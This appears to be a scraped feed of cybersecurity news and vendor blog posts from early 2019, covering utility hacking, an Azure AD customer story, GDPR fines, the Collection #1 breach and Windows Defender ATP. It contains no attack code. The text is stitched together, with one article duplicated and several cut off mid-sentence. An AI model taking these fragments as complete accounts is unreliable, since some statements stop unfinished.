The post Federal Cybersecurity Posture “Untenable,” According to OMB Risk Report appeared first on The State of Security.

Reported Cyber Attacks on U.S. Electric Utilities and Government Agencies

Hundreds of contractors and subcontractors with connections to U.S. electric utilities and government agencies have been hacked, according to a recent report by the Wall Street Journal. The U.S. government has linked the hackers to a Russian state-sponsored group, sometimes called Dragonfly or Energetic Bear. The U.S. government alerted the public that the hacking campaign started in March 2016, if not earlier, although many of its victims were unaware of the incident until notified by the Federal Bureau of Investigation and Department of Homeland Security, the Wall Street Journal reports.

Instead of using sophisticated techniques to directly attack utilities companies, the hackers largely “exploited trusted business relationships using impersonation and trickery” to access the networks of U.S. electric utilities, such as by planting malware on sites of online publications frequently read by utility engineers and through clever spear phishing emails. According the article, Jonathan Homer, the Department of Homeland Security’s Chief of Industrial Control Systems Group, reported in a briefing to utilities last year that the hackers could have caused temporary power outages. While the exact number of utilities and vendors compromised is unknown the article goes on, industry experts say that the hackers likely still have access to some systems.

Voice of the Customer: Azure AD helps lululemon enable productivity and security all at once for its employees

Todays post was written by Sue Bohn, Director of Program Management at Microsoft, and Simon Cheng, who is responsible for Identity and Access Management at lululemon.

Happy New Year and welcome to the next installment of the Voice of the Customer blog series. My name is Sue Bohn and I am the director of Program Management for Identity and Access Management. Im really excited about our next blog in this series. Last time, we featured The Walsh Group. Today, I am sharing a story from lululemon, who really inspired me to think more broadly about what you can achieve when you step back and look at where you want to go.

Simon Cheng, responsible for Identity and Access Management at lululemon, is today a strong believer that every step towards cloud Identity and Access Management makes you more secure, but that wasnt always the case. Read on to learn more about lululemons experience implementing Azure Active Directory (Azure AD).

Too many apps, too many passwords

At lululemon, our journey to Azure AD began with two overarching business requirements: 1. Secure all our apps and 2. Simplify user access. We knew, based on the typical behavior weve seen in the past, that most of our users were likely using the same corporate password across all the apps they use, including the ones we dont manage. This meant that if even just one of these apps had security vulnerabilities, a hacker could exploit the vulnerability to get into our corporate resources. And we would have no idea! Our security is only as strong as the weakest app being accessed, and so if you can imagine the challenge was that we had over 300+ applications! To protect our corporate resources, we needed to ensure that the authentication process for each app was secure.

Our shadow IT environment wasnt just a security challenge, it also frustrated our users. Over and over we heard there are too many portals and too many passwords. This sentiment drove our second business requirement, which we boiled down to an overriding principle: Not another portal, not another password. So, our solution needed to address security and simplify user access without reducing business flexibility. The obvious answer was to consolidate identities, and this quickly led us to Azure AD and Microsoft Enterprise Mobility + Security (EMS). As an Office 365 customer, our users were comfortable and familiar with the Office 365 sign-in experience, and so it was an easy decision. Once we had chosen a solution, our next big task was rolling it out without disrupting our users, which is really where my concern waswould our users embrace it?

Single Sign On (SSO) sells itself

When we began the rollout of Azure AD, our top concern was whether our employees would comply. As it turns out I completely underestimated our users, and my concerns were really nothing. Within three months of the Azure AD rollout, our users loved the SSO experience so much that the business units came to us requesting that additional apps get rolled on. Even risk-based Multi-Factor Authentication (MFA) enforced by Azure AD conditional access policy feature went smoother than I expected. We hardly heard any complaints and even fewer calls on how to set it up. For highly sensitive apps, such as our financial and HR apps, we followed a recommended approach to enforce MFA at every sign-in. For several other less sensitive apps, we were able to prioritize user experience and protect them with risk-based conditional access rules.

In 2013, we had two apps onboarded: ServiceNow and Workday; now we have over 200! And every single one of our 18,000 users are protected by conditional access and MFA. I am really proud of this accomplishment as it has enabled higher productivity for our organization while maintaining stronger security because our employees are using it! This experience taught me not to underestimate our users, and I think this is because they are familiar with security measures, having already learned to do so through consumer services such as social media. Had I known this when we started, I would have deployed Azure AD much sooner.

The cloud allowed us to implement more security features faster than we ever could on-premises

Once we had Azure AD deployed, our next project was to implement Azure AD Privileged Identity Management (PIM). Azure AD PIM allows us to enable just in time administrative access, which significantly reduces the possibility that our administrative accounts will get compromised. Launching PIM was an eye-opening experience! This is a capability that is very labor intensive and time consuming to operate typically.

I am constantly delighted with how fast I can deploy services in the cloud, Azure AD PIM being a prime example. More often than not, the trap Ive seen organizations fall into is that they plan based on capabilities that exist within solutions rather than whats needed to secure their users. This is exactly where Azure AD and cloud wins over on-premises solutions. My takeaway has been that it is better to step back and plan what needs to be done for my organization and then just let the cloud services roll in almost automagically. Of course, where there are gaps, I work directly with the Azure AD engineering team!

Just in the last year, we have deployed, from pilot to production:

  1. Azure AD Connect implementation and Self Service Password Reset (SSPR) migration from the old tool (6 weeks)
  2. MFA registration, Azure AD conditional access, and Azure AD Identity Protection (7 weeks)
  3. Microsoft Advanced Threat Analytics (3 weeks)
  4. Group-based licensing (3 days)
  5. Azure Information Protection (8 weeks)
  6. Azure AD Privileged Identity Management (3 days!)
  7. Countless apps (each in a matter of hours!)

Learnings from lululemon

A big thanks to Simon! It is always great to learn from our customers’ deployments. In lululemons case, the need to take a step back and develop a plan based on the security goals, rather than a set of capabilities, really hits home. We can always plan something in the confines of what we currently have, but the fact is that new features get rolled out at cloud speed. It is great to see customers like lululemon deploy services in the cloud so quickly and benefit from them. Come back to our Secure blog to check in on our next customer blog and also read some other articles around Identity and Access Management and Zero Trust Networks.

The post Voice of the Customer: Azure AD helps lululemon enable productivity and security all at once for its employees appeared first on Microsoft Secure.

Azure AD helps lululemon enable productivity and security all at once for its employees

Todays post was written by Sue Bohn, Director of Program Management at Microsoft, and Simon Cheng, who is responsible for Identity and Access Management at lululemon.

Happy New Year and welcome to the next installment of the Voice of the Customer blog series. My name is Sue Bohn and I am the director of Program Management for Identity and Access Management. Im really excited about our next blog in this series. Last time, we featured The Walsh Group. Today, I am sharing a story from lululemon, who really inspired me to think more broadly about what you can achieve when you step back and look at where you want to go.

Simon Cheng, responsible for Identity and Access Management at lululemon, is today a strong believer that every step towards cloud Identity and Access Management makes you more secure, but that wasnt always the case. Read on to learn more about lululemons experience implementing Azure Active Directory (Azure AD).

Too many apps, too many passwords

At lululemon, our journey to Azure AD began with two overarching business requirements: 1. Secure all our apps and 2. Simplify user access. We knew, based on the typical behavior weve seen in the past, that most of our users were likely using the same corporate password across all the apps they use, including the ones we dont manage. This meant that if even just one of these apps had security vulnerabilities, a hacker could exploit the vulnerability to get into our corporate resources. And we would have no idea! Our security is only as strong as the weakest app being accessed, and so if you can imagine the challenge was that we had over 300+ applications! To protect our corporate resources, we needed to ensure that the authentication process for each app was secure.

Our shadow IT environment wasnt just a security challenge, it also frustrated our users. Over and over we heard there are too many portals and too many passwords. This sentiment drove our second business requirement, which we boiled down to an overriding principle: Not another portal, not another password. So, our solution needed to address security and simplify user access without reducing business flexibility. The obvious answer was to consolidate identities, and this quickly led us to Azure AD and Microsoft Enterprise Mobility + Security (EMS). As an Office 365 customer, our users were comfortable and familiar with the Office 365 sign-in experience, and so it was an easy decision. Once we had chosen a solution, our next big task was rolling it out without disrupting our users, which is really where my concern waswould our users embrace it?

Single Sign On (SSO) sells itself

When we began the rollout of Azure AD, our top concern was whether our employees would comply. As it turns out I completely underestimated our users, and my concerns were really nothing. Within three months of the Azure AD rollout, our users loved the SSO experience so much that the business units came to us requesting that additional apps get rolled on. Even risk-based Multi-Factor Authentication (MFA) enforced by Azure AD conditional access policy feature went smoother than I expected. We hardly heard any complaints and even fewer calls on how to set it up. For highly sensitive apps, such as our financial and HR apps, we followed a recommended approach to enforce MFA at every sign-in. For several other less sensitive apps, we were able to prioritize user experience and protect them with risk-based conditional access rules.

In 2013, we had two apps onboarded: ServiceNow and Workday; now we have over 200! And every single one of our 18,000 users are protected by conditional access and MFA. I am really proud of this accomplishment as it has enabled higher productivity for our organization while maintaining stronger security because our employees are using it! This experience taught me not to underestimate our users, and I think this is because they are familiar with security measures, having already learned to do so through consumer services such as social media. Had I known this when we started, I would have deployed Azure AD much sooner.

The cloud allowed us to implement more security features faster than we ever could on-premises

Once we had Azure AD deployed, our next project was to implement Azure AD Privileged Identity Management (PIM). Azure AD PIM allows us to enable just in time administrative access, which significantly reduces the possibility that our administrative accounts will get compromised. Launching PIM was an eye-opening experience! This is a capability that is very labor intensive and time consuming to operate typically.

I am constantly delighted with how fast I can deploy services in the cloud, Azure AD PIM being a prime example. More often than not, the trap Ive seen organizations fall into is that they plan based on capabilities that exist within solutions rather than whats needed to secure their users. This is exactly where Azure AD and cloud wins over on-premises solutions. My takeaway has been that it is better to step back and plan what needs to be done for my organization and then just let the cloud services roll in almost automagically. Of course, where there are gaps, I work directly with the Azure AD engineering team!

Just in the last year, we have deployed, from pilot to production:

  1. Azure AD Connect implementation and Self Service Password Reset (SSPR) migration from the old tool (6 weeks)
  2. MFA registration, Azure AD conditional access, and Azure AD Identity Protection (7 weeks)
  3. Microsoft Advanced Threat Analytics (3 weeks)
  4. Group-based licensing (3 days)
  5. Azure Information Protection (8 weeks)
  6. Azure AD Privileged Identity Management (3 days!)
  7. Countless apps (each in a matter of hours!)

Learnings from lululemon

A big thanks to Simon! It is always great to learn from our customers’ deployments. In lululemons case, the need to take a step back and develop a plan based on the security goals, rather than a set of capabilities, really hits home. We can always plan something in the confines of what we currently have, but the fact is that new features get rolled out at cloud speed. It is great to see customers like lululemon deploy services in the cloud so quickly and benefit from them. Come back to our Secure blog to check in on our next customer blog and also read some other articles around Identity and Access Management and Zero Trust Networks.

The post Azure AD helps lululemon enable productivity and security all at once for its employees appeared first on Microsoft Secure.

Google fined $57 million in France for GDPR violation

In an action initiated against Google LLC by two Activists, the Commission Nationale de l’informatique et des libertés (CNIL) carried

Google fined $57 million in France for GDPR violation on Latest Hacking News.

Most out of date applications exposed: Shockwave, VLC and Skype top the list

More than half (55%) of PC applications installed worldwide are out-of-date, making PC users and their personal data vulnerable to security risks. Avast’s PC Trends Report 2019 found that users are making themselves vulnerable by not implementing security patches and keeping outdated versions of popular applications on their PCs. The applications where updates are most frequently neglected include Adobe Shockwave (96%), VLC Media Player (94%) and Skype (94%). The report, which uses anonymized and aggregated … More

The post Most out of date applications exposed: Shockwave, VLC and Skype top the list appeared first on Help Net Security.

First Large GDPR Fine issued and its to Google for €50 million

Every member state, organisation and almost every individual have been watching supervisory authorities closely to see if and who will

First Large GDPR Fine issued and its to Google for €50 million on Latest Hacking News.

5G Is Coming: Security Risks You Need to Know About

The future of connectivity is here ­– 5G. This new network is set to roll out across the nation this coming year and bring greater speed to our handheld devices, which means more data and lower latency. But perhaps one of the most anticipated and popular benefits is it will allow even more IoT devices to come online and encourage more connection between said devices. This would enable users to remotely connect to or monitor their IoT devices like kitchen or security gadgets. The promise of more connectivity, smoother IoT user experience, and even more devices online, means there are likely more opportunities and avenues for cyberattacks. 5G will no doubt shape the foreseeable future, let’s see how.

Today, interconnected devices operate on low-powered, low-data-rate networks, such as Cat-M and NB-IoT. With the introduction of 5G networks across the world, the capabilities of VR and AR, AI and ML, and automation and robotics will enhance immensely. Take self-driving cars, for example. These machines require close proximity to their computing to reduce the latency of decision making. The capabilities of 5G don’t end there either. From manufacturing, transportation and logistics, to public safety and the establishment of smart cities, industries are at the ready to take their business to the next level with 5G. With this newfound growing anticipation for the future of 5G, the question has to be asked, what are the security implications for smaller IoT devices?

From an innovation standpoint, 5G is a beacon of light, but from a cybersecurity standpoint, 5G is a “hotbed for a new era of intensified cyberwar.” Denial-of-service attacks, or DDoS, are particular causes of concern for cybersecurity researchers. Devices like refrigerators, thermometers, even light bulbs, will be able to come online because of 5G. Users will be able to remotely check on these appliances through a simple app, but these devices can also be usurped by malicious characters. This increased connectivity and power could see big name sites down for days, or even affect city utility capabilities. Government agencies and private entities are not immune either, but they do have plans in place in the event a DDoS attack occurs.

While consumers can only wait and see what happens with the rollout, industries across the board will want to harness the benefits of 5G. However, consumers and organizations alike need to be cautious in terms of how 5G could be used to help, or hinder, us in the future. Rest assured, even if malicious actors utilize this technology, McAfee’s security strategy will continue to keep pace with the ever-changing threat landscape.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post 5G Is Coming: Security Risks You Need to Know About appeared first on McAfee Blogs.

Unauthorised Remote Access Vulnerability Discovered on Cisco Small Business Switches

Businesses using Cisco Small Business 200 Series Smart Switches; CSB 300 Series Managed Switches;  Cisco 250 Series Smart Switches; CSB

Unauthorised Remote Access Vulnerability Discovered on Cisco Small Business Switches on Latest Hacking News.

Industry reactions to Google’s €50 million GDPR violation fine

On 21 January 2019, the French National Data Protection Commission (CNIL) imposed a financial penalty of €50 million against Google, in accordance with the GDPR. This is the first time that the CNIL applies the new sanction limits provided by the GDPR. The amount decided and the publicity of the fine are justified by the severity of the infringements observed regarding the essential principles of the GDPR: transparency, information and consent. Here are some reactions … More

The post Industry reactions to Google’s €50 million GDPR violation fine appeared first on Help Net Security.

Business resilience should be a core company strategy, so why are businesses struggling to take action?

A recent survey showed that only 51% of U.S. business decision makers say their organization is definitely as resilient as it needs to be against disruptions such as cyber threats. In addition, the survey showed that 96% of U.S. business decision makers claim business resilience should be a core company strategy. If 96% of business decision makers realize this, why are organizations still struggling to protect themselves against cybercrime and technology-based disruption? IT teams face … More

The post Business resilience should be a core company strategy, so why are businesses struggling to take action? appeared first on Help Net Security.

Agents of disruption: Four testing topics argue the case for agentless security

Let me introduce myself. I’m a set of flaws in your otherwise perfect, agent-based security world. Like all disruptive agents, I derail your best-laid plans with expensive havoc; but in my case I create sticky situations inside your multi-cloud arrangement. You may be thinking that the premise of this article is bogus, because most cloud-based security systems automate the deployment and management of agents; and any one of those and their kid can microsegment and … More

The post Agents of disruption: Four testing topics argue the case for agentless security appeared first on Help Net Security.

SSDP amplification attacks rose 639%

The Nexusguard Q3 2018 Threat Report has revealed the emergence of an extremely stealthy DDoS attack pattern targeting communications service providers (CSPs). Comparison between normal attack traffic and attack traffic with legitimate traffic This new vector exploits the large attack surface of ASN-level (autonomous system number) CSPs by spreading tiny attack traffic across hundreds of IP addresses to evade detection. The ongoing evolution of DDoS methods suggests that CSPs need to enhance their network security … More

The post SSDP amplification attacks rose 639% appeared first on Help Net Security.

Beware the man in the cloud: How to protect against a new breed of cyberattack

One malicious tactic that has become quite prevalent in recent years is known as a ‘man in the cloud’ (MitC) attack. This attack aims to access victims’ accounts without the need to obtain compromised user credentials beforehand. Below, this article explains the anatomy of MitC attacks and offers practical advice about what can be done to defend against them. What is MitC attack? To gain access to cloud accounts, MitC attacks take advantage of the … More

The post Beware the man in the cloud: How to protect against a new breed of cyberattack appeared first on Help Net Security.

Machine learning trumps AI for security analysts

While machine learning is one of the biggest buzzwords in cybersecurity and the tech industry in general, the phrase itself is often overused and mis-applied, leaving many to have their own, incorrect definition of what machine learning actually is. So, how do you cut through all the noise to separate fact from fiction? And how can this tool be best applied to security operations? What is machine learning? Machine learning (ML) is an algorithm that … More

The post Machine learning trumps AI for security analysts appeared first on Help Net Security.

Cybercrime could cost companies trillions over the next five years

Companies globally could incur $5.2 trillion in additional costs and lost revenue over the next five years due to cyberattacks, as dependency on complex internet-enabled business models outpaces the ability to introduce adequate safeguards that protect critical assets, according to Accenture. Based on a survey of more than 1,700 CEOs and other C-suite executives around the globe, the report — Securing the Digital Economy: Reinventing the Internet for Trust — explores the complexities of the … More

The post Cybercrime could cost companies trillions over the next five years appeared first on Help Net Security.

Researchers analyze DDoS attacks as coordinated gang activities

In a new report, NSFOCUS introduced the IP Chain-Gang concept, in which each chain-gang is controlled by a single threat actor or a group of related threat actors and exhibit similar behavior among the various attacks conducted by the same gang. IP Gang attack-type classification against attack volume size Researchers analyzed attack types, volume, size of events, gang activities, and attack rates. By studying the historical behavior of the 80 gangs identified in the report, … More

The post Researchers analyze DDoS attacks as coordinated gang activities appeared first on Help Net Security.

The Imperative to Address Security Concerns of the Rapidly Evolving Internet of Things

The Internet of Things (IoT) broadly refers to devices and equipment that are readable, recognizable, locatable, addressable and/or controllable via the internet. This includes everything from edge computing devices to home appliances, from wearable technology to cars. IoT represents the melding of the physical world and the digital worked, as sensors are not costly and wireless access is […]… Read More

The post The Imperative to Address Security Concerns of the Rapidly Evolving Internet of Things appeared first on The State of Security.

Monero Price Analysis: Stronger Malware to Mine Monero; XMR/USD Has Room for Another Potential Squeeze South

Researchers: a stronger malware has been uncovered, which can mine Monero. XMR/USD price action remains stuck in a narrowing range, subject to an imminent breakout. The XMR/USD price has seen some upside on Saturday, holding gains of around 3% towards the latter stages of the day. Despite the press higher from the bulls, a move […]

The post Monero Price Analysis: Stronger Malware to Mine Monero; XMR/USD Has Room for Another Potential Squeeze South appeared first on Hacked: Hacking Finance.

6 Reasons We Need to Boost Cybersecurity Focus in 2019

Paying attention to cybersecurity is more important than ever in 2019. But, some companies are still unwilling to devote the necessary resources to securing their infrastructures against cyberattacks, and naive individuals think they’re immune to the tactics of cybercriminals, too.

For people who still need some convincing that cybersecurity is an essential point of focus, here are six reasons.

1. The Average Cost of a Cyberattack Exceeds $1 Million

It’s no surprise that cyberattacks are costly, but some people will likely be shocked at the massive expenses that could result. According to a recent report from Radware, the total costs are more than $1 million. Additionally, victims report issues not directly related to financial losses, such as decreases in productivity or negative customer experiences.

Based on the above statistic, enterprises should conclude that although it costs money to invest in cybersecurity strategies, the expenses could be more substantial if organizations choose not to put enough of their resources toward experts and tools that minimize threats.

2. The U.S. Government Says It’s Time to Come Up With a Better Plan

The U.S. government, as well as the authorities from other nations, continually struggle to safeguard against digital attacks from rivals. The challenges are so immense that government bodies and officials warn that the United States needs an improved way to stop adversaries.

A State Department report warned that the country is increasingly dependent on networked information systems, and foes from other nations have learned to exploit that dependence and use it to disrupt the lives of Americans.

Most people who live in the U.S. can at least imagine the consequences of a severe cyber attack that affected the country’s ability to proceed with normal operations. Since government authorities researched the possibility and asserted there’s no time to waste in coming up with an improved approach to cybersecurity, that’s all the more reason to take action this year.

3. The Methods of Attack Are Diversifying

A decade or so ago, people typically felt sufficiently secure online by installing anti-virus software on their computers. That’s still a worthy precaution to take, but it’s no longer adequate for preventing all or even most of the attacks a hacker might try.

According to a 2014 report, cybercriminals orchestrated 75 percent of attacks through publicly known software vulnerabilities. But, they also try to gain people’s credentials through phishing attacks, lock down their systems with ransomware or infiltrate poorly secured connected devices to name but a few possibilities.

People have a growing number of ways to use technology and rely on connected devices, but that also means the likelihood goes up for potentially unfamiliar kinds of attacks. Focusing on cybersecurity this year requires, in part, understanding the most recent and common types of threats and protecting networks against them.

4. Recent Breaches Victimized Millions

Equifax and Starwood/Marriott dealt with breaches that compromised the data of well over 100 million victims. The earlier revelation about the financial costs of cyber attacks is damning in itself, but it’s crucial for brands — and consumers themselves — to recognize that data breaches can be unintentional or malicious, but in any case, they could affect millions of people.

Then, affected companies have to engage in damage control in an attempt to restore lost trust. Even when those entities put forth the effort, they may still find that customers behave differently following breaches.

More specifically, an April 2018 study examined the connection between consumer trust and spending. It involved respondents giving a trust score to businesses. The survey revealed that 15 percent of low-trust customers decreased how much they spent at companies. But, in cases of high instances of trust, the decrease in consumer spending was only 4 percent.

5. It Takes Months to Identify and Contain Breaches

If a person or business has a significant water leak in a well-used area, the problem is usually easy to spot and fix. But, it’s typically not so straightforward with cyber-related issues.

Research from 2018 published by IBM found that, on average, it takes 197 days to identify a breach and 69 days to contain it. Those timeframes give hackers plenty of time to do damage that may prove irreparable. Then, once headlines indicate how long a breach remained unnoticed, the reputational damage could be severely harmful, too.

Making cybersecurity a focal point this year could minimize the time spent looking for areas of concern within a network, especially if using artificial intelligence-based strategies that learn normal conditions and give warnings about deviations.

6. Cybercrime Is Extremely Profitable

Some criminals alter their methods once it becomes apparent that their current wrongdoings are no longer profitable. But, that probably won’t happen for a while concerning online-based crimes. Research from a criminology expert published in April 2018 highlighted how the worldwide revenues from cybercrime are at least 1.5 trillion annually.

The investigation talked about how cybercrime represents an interconnected web of profit possibilities with blurred lines between legal and illegal activities. If people don’t fight back against online criminals at both personal and organizational levels, hackers will have more opportunities than ever to continue making income while others suffer.

Failing to Focus on Cybercrime This Year Could Cause an Assortment of Issues

This list highlights some of the most prominent reasons why it’s essential to make cybersecurity a priority in 2019. Hackers get progressively more skilled at carrying out attacks, and they can cause significant catastrophes on unprotected or poorly defended

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – 2019 Cybersecurity predictions, cyberattacks)

The post 6 Reasons We Need to Boost Cybersecurity Focus in 2019 appeared first on Security Affairs.

Troy Hunt: the largest data leak in history

The Details of at Least 773 Million People Surfaced on a Free Cloud Storage Service

The details of at least 773 million people surfaced on free cloud storage service last week, reported Troy Hunt, Australian web security expert, and administrator of Have I Been Pwned (HIBP) website. As you might already know, Troy has been collecting data from many data breaches over the last five years. He has been compiling it into a single database, so people have the opportunity to search across multiple data breaches and find out if their details have been compromised at some point in the past. The website allows searches by password and email.

When we heard the news about what Gizmodo calls the ‘mother of all breaches,’ we initially thought that Troy Hunt and his database had been hacked. However, this was quickly debunked as Troy himself confirmed that he is the one who actually found the pile of stolen data. He called the breach ‘Collection #1’ and highlighted that this is the ‘single largest breach ever to be loaded into HIBP.’

This incident shows that Troy Hunt was not the only one who has been piling up information from past data breaches. An anonymous hacker uploaded approximately 12,000 files containing 772,904,99 emails and 21,222,975 unique passwords into a single large database. Troy reported that the 87GB worth of stolen data was published on a free cloud service called MEGA. What makes this breach particularly interesting is that this is the first part of a much bigger database of stolen data. Troy Hunt reported that he is in possession of four more collections, and he is currently reviewing them. He will be making a call on what to do with them after investigating them further. MEGA has since deleted the database.

While most of the data included in ‘Collection #1’ was already in HIBP, the data in collections #2 through #5 may end up making this one of the biggest data breaches ever seen. It is currently unknown if collections #2 to #5 are as big as ‘Collection #1’. If the remaining four collections are as significant as the first one, this may end up exposing details of billions of people.

What should you do?

The database is compiled of old data breaches, so if the data comes from known breaches, you most likely have been notified either by the service or by HIBP to change your password a long time ago. However, quite often data breaches sometimes take years to be discovered, so regular password changes are strongly recommended. Avoid using the same password on multiple platforms. The cybersecurity budgets of some companies are significantly lower when compared to others – we are confident JP Morgan Chase spends more on developing stronger security when compared to a t-shirt store. But if the passwords you use at both organizations are the same, hackers can steal your details from the weak organization and use the login credentials to get unauthorized access to services such as your internet banking.

You can easily check if your passwords or email addresses have been part of ‘Collection #1’ or if they have been pwned in the pat. You can search if your emails have been pwned here https://haveibeenpwned.com/, and learn if your passwords are part of the breach by testing them here https://haveibeenpwned.com/Passwords.

Last but not least, have anti-virus software installed on all your connected devices. Most of the times high-quality anti-virus software comes with a password manager that will help you always know your password. Apart from the password management options, such software could also prevent hackers from stealing the missing piece from the puzzle that would allow them to make you a victim of cybercrime.

Download your Antivirus

The post Troy Hunt: the largest data leak in history appeared first on Panda Security Mediacenter.

The Collection #1 Data Breach: Insights and Tips on This Cyberthreat

As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the Equifax data breach, a new monster breach now has to become top of mind for us all. Say hello to Collection #1, a data set exposing 772,904,991 unique email addresses and over 21 million unique passwords.

Discovered by security researcher Troy Hunt, Collection #1 first appeared on the popular cloud service called MEGA. The Collection #1 folder held over 12,000 files that weigh in at over 87 gigabytes. When the storage site was taken down, the folder was then transferred to a public hacking site. What’s truly astonishing about this is that the data was not for sale; it was simply available for anyone to take.

You may be wondering, how was all this data collected? It appears that this data was comprised of a breach of breaches, aggregating over 2,000 leaked databases containing cracked passwords, in order to achieve maximum exposure. The sheer volume of this breach makes Collection #1 the second largest in size to Yahoo, and the largest public breach ever (given the data was openly exposed on the internet).

It appears that this data set is designed for use in credential-stuffing attacks, where cybercriminals will use email and password combinations to hack into consumers’ online accounts. The risks could be even greater for those who reuse credentials across multiple accounts. In order to help protect yourself from this threat, it’s vital that users act fast and use the following tips to help protect their data:

  • Use strong, unique passwords. In addition to making sure all of your passwords are strong and unique, never reuse passwords across multiple accounts. You can also enable a password manager to help keep track of your credentials.
  • Change your passwords. Even if it doesn’t appear that your data was breached, it’s better to err on the side of caution and change all of your passwords to better protect yourself.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Collection #1 Data Breach: Insights and Tips on This Cyberthreat appeared first on McAfee Blogs.

Protecting privileged access in DevOps and cloud environments

While security strategies should address privileged access and the risk of unsecured secrets and credentials, they should also closely align with DevOps culture and methods to avoid negatively impacting developer velocity and slowing the release of new services. Example of tools in the DevOps pipeline Despite this, 73 percent of organizations surveyed for the 2018 CyberArk Global Advanced Threat Landscape report have no strategy to address privileged access security for DevOps. Key recommendations The report … More

The post Protecting privileged access in DevOps and cloud environments appeared first on Help Net Security.

Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices

Digital transformation and the transition to a modern workplace encourage employee engagement, productivity, and collaboration. This transition poses major challenges in protecting sensitive information. In the modern workplace, the perimeter between the corporate network and the cloud are fading. Sensitive data constantly travels between different locations and is often shared with others both inside and outside the organization. This significantly increases the attack surface and makes identifying, protecting, and monitoring sensitive data challenging.

Additionally, the threat landscape is evolving. External adversaries and insider threats are becoming more sophisticated and dangerous. Data breaches are at an all-time high in terms of both the number of breaches and the overall severity and business impact. As a result, governments and regulators are instituting stricter regulations with unprecedented fines for not properly protecting and governing sensitive information.

Traditional solutions that put walls around your network perimeter do not suffice. You are at risk of over-protecting where you shouldnt, degrading employee productivity by interrupting legitimate workflows, and under-protecting where you should when sensitive data is being exfiltrated.

Consider the following principles when shaping your information protection strategy:

  1. Visibility You cant protect what you cant see. Strive to achieve complete visibility into sensitive data across all repositories.
  2. Data-centric protection Protect your data, not your perimeter. Apply information protection capabilities that are content-aware to improve protection coverage and reduce end-user friction due to unnecessary interruptions. Make sure sensitive data stays protected wherever it goes; this is especially important in a modern workplace, where data is constantly on the move.
  3. Assume breach Sophisticated attackers, external adversaries, or insider threats will find a way around any wall you put in front of them. Implement post-breach techniques that constantly monitor sensitive data usage in your organization, correlate this data to other suspicious behaviors, and allow you to respond and mitigate risks.

The endpoint is a key point of control when implementing an effective information protection strategy based on these principles. Endpoints are often the entry for sophisticated attacks conducted by an external adversary or an insider threat. Combine it with the fact that endpoints are usually the darkest spot in the enterprise for security and compliance teams, and you end up with a critical weakness in the enterprise information security posture.

Windows Defender Advanced Threat Protection (Windows Defender ATP), Microsofts endpoint protection platform, addresses this challenge by integrating with Azure Information Protection, Microsofts data classification, labeling, and protection solution. This integration empowers Windows to natively understand Azure Information Protection sensitivity labels, to provide visibility into sensitive data on endpoints, to protect sensitive data based on its content, and to detect and respond to post-breach malicious activity that involves or affects sensitive data.

Windows Defender ATP is built into the OS, removing the need for deployment and agent maintenance, ensuring that end-user experience is not impacted when performing legitimate business workflows. No on-premises infrastructure or endpoint agents are required. The seamless integration with Azure Information Protection reporting and management experience ensures that data administrators can continue to leverage their existing Azure Information Protection experience to manage these new capabilities.

Discover sensitive documents on Windows devices

Windows Defender ATPs built-in sensors discovers labeled data on all devices monitored by the Windows Defender ATP service. This data is then seamlessly plugged into the Azure Information Protection reporting experience and enriched with labeled documents discovered on Windows devices. This allows existing Azure Information Protection customers to get instant visibility into sensitive data on devices using the same dashboard and analytics tools they use today.

Figure 1. Azure Information Protection Data discovery dashboard shows data discovered by both Windows Defender ATP and Azure Information Protection

It doesnt end there. Being an endpoint protection suite, Windows Defender ATP monitors and calculates device machine risk level an aggregated indicator of active security threats on each device. This data is also shared with Azure Information Protection reports, allowing data administrators to proactively understand whether sensitive corporate data resides on any compromised devices. To understand why the device is compromised, all it takes is a single click in the Azure Information Protection dashboard to be directed to that devices record in Windows Defender ATP, where the administrator can investigate and mitigate detected security threats.

Figure 2. Azure Information Protection Data discovery dashboard shows device risk calculation

Turning on this integration is a matter of a single flip of a switch in the advanced features settings page in Windows Defender Security Center. Windows endpoints will start discovering labeled documents immediately.

Figure 3. Windows Defender Security Center Settings page

Figure 3. Windows Defender Security Center Settings page

Prevent sensitive data leaks from Windows devices

Windows Defender ATP can further protect sensitive data by providing data loss prevention (DLP) functionality. Built using the combined Windows Defender ATP native OS sensors and its advanced cloud-based analytics, Windows Defender ATP can help detect and mitigate data leak risks, ranging from accidental end-user mistake to a sophisticated malicious attack.

It all starts from the Office 365 Security and Compliance Center (SCC), Microsofts unified management console for information protection, where you can manage information protection configuration settings on Windows devices. As part of the label policy, you can define whether files with a specific label applied will be protected by Windows Defender ATP.

Figure 4. Office Security & Compliance Center  Endpoint data loss prevention configuration page

Figure 4. Office Security & Compliance Center Endpoint data loss prevention configuration page

Once that policy is in place, Windows Defender ATP will start protecting documents with a matching label. Protection is applied by automatically enabling Windows Information Protection, which prevents unallowed client apps, cloud apps, and network locations from accessing protected files and their content, reducing the risk of data leak.

In addition, Windows Defender ATP integrates sensitive data awareness into Windows Defender Security Center. Each incident or alert raised in Windows Defender Security Center includes a data sensitivity attribute that is generated by aggregating the sensitivity of all the labeled files discovered on devices that are affected by the incident. This allows security analysts to prioritize incident response based on data sensitivity. When investigating an incident, security analysts can use data sensitivity context across the entire investigation from the incident dashboard, through analyzing sensitive data exposure of specific machines, all the way to Advanced hunting.

Figure 5. Windows Defender Security Center Incident queue, sorted by data sensitivity

Conclusion

Protecting sensitive data requires a comprehensive approach. Sensitive data stored on devices that are constantly on the move presents its own unique challenges. Windows Defender ATP and Azure Information Protection work together to effectively reduce the possibility of losing sensitive data. Together, these solutions provide discovery and protection capabilities required to govern and protect sensitive data, enforce compliance, and proactively mitigate risks.

These are just the first few steps weve taken to enhance the information protection capabilities. Stay tuned for more upcoming features built into Windows 10.

Start here to learn how you can leverage of this capability.

 

 

 

Omri Amdursky
Windows Defender ATP team

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

